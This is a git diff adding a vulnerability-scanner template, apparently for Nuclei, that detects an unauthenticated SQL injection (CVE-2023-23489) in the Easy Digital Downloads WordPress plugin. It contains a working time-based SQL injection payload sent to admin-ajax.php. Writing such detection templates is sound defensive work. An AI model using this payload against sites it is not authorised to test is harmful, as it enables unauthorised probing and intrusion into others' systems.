diff --git a/cves/2023/CVE-2023-23489.yaml b/cves/2023/CVE-2023-23489.yaml new file mode 100644 index 0000000000..36c6b78236 --- /dev/null +++ b/cves/2023/CVE-2023-23489.yaml @@ -0,0 +1,38 @@ +id: CVE-2023-23489 + +info: + name: Easy Digital Downloads 3.1.0.2 & 3.1.0.3 - Unauthenticated SQLi + author: theamanrawat + severity: critical + description: | + The Easy Digital Downloads WordPress Plugin, versions 3.1.0.2 & 3.1.0.3, is affected by an unauthenticated SQL injection vulnerability in the 's' parameter of its 'edd_download_search' action. + reference: + - https://wpscan.com/vulnerability/c5a6830c-6420-42fc-b20c-8e20224d6f18 + - https://wordpress.org/plugins/easy-digital-downloads/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-23489 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-23489 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2023,sqli,wpscan,wordpress,wp,easy-digital-downloads,unauth + +requests: + - raw: + - | + @timeout: 10s + GET /wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Connection: close + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "[]")' + condition: and \ No newline at end of file